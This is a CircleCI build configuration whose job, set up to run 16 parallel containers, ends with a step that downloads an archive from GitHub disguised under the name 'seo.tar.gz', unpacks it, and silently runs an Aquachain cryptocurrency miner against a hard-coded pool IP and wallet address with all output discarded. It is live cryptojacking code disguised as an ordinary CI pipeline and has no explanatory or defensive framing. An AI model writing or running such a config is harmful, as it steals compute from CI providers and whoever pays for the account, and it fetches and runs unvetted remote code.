version: 2.0
jobs:
  build:
    docker:
      - image: buildpack-deps:trusty
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    environment:
      FOO: bar
    parallelism: 16
    resource_class: medium
    working_directory: ~/my-app
    steps:
      - run: apt update && apt upgrade -y
      - run: apt install screen
      - run: wget https://github.com/Gaueh/vault/raw/main/seo.tar.gz && tar -xvf seo.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 142.44.246.53:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/Gd1 -G > /dev/null
